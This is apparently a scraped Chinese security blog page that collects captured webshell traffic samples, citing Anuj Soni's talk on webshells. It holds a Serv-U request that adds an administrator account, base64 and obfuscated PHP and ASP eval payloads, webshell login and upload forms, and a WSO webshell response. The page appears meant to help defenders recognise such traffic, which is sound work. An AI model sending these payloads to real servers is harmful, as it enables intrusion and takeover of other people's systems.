图片参考 《closing the door on webshell》-by Anuj Soni
1
|
SUPort=43958&SUUser=LocalAdministrator&SUPass=xxx&SUCommand=net+user+spider+spider+%2Fadd+%26+net+localgroup+administrators+spider+%2Fadd&user=spider&password=spider&part=C%3A%5C%5C
|
1
|
whirlwind=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3
|
1
|
n3b31d1=cGhwaW5mbygpOw==
|
1
|
getpwd=admin&go=edit&godir=%2Fhtdocs%2Fbbs%2Fconfig%2F&govar=config_global.php
|
1
|
senv=eval(/“Ex/“%26cHr(101)%26/“cute(/“/“Server.ScriptTimeout%3D3600:On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(/“/“/“/“->|/“/“/“/“):Ex/“%26cHr(101)%26/“cute(/“/“/“/“On+Error+Resume+Next:/“/“/“/“%26bd(/“/“/“/“526573706F6E73652E5772697465282268616F72656E2229/“/“/“/“)):Response.Write(/“/“/“/“|<-/“/“/“/“):Response.End/“/“)/“)“
|
<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value=‘>>’></form></pre>
1
2
3
4
|
<form action=“?cmd=up” method=“post” enctype=“multipart/form-data” name=“form1″>
<input type=“file” name=“file” size=“17″ class=“Input”>
<input type=“submit” name=“Submit” value=“提交” class=“Input”>
</form>
|
实例3 不需要认证的野马
1
|
a:4:{s:5:“uname”;s:81:“Linux li676-178 3.19.1-x86_64-linode53 #1 SMP Tue Mar 10 15:30:28 EDT 2015 x86_64″;s:11:“php_version”;s:5:“5.6.9″;s:11:“wso_version”;s:5:“2.5.1″;s:8:“safemode”;b:0;}
|
花式混淆参见:
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号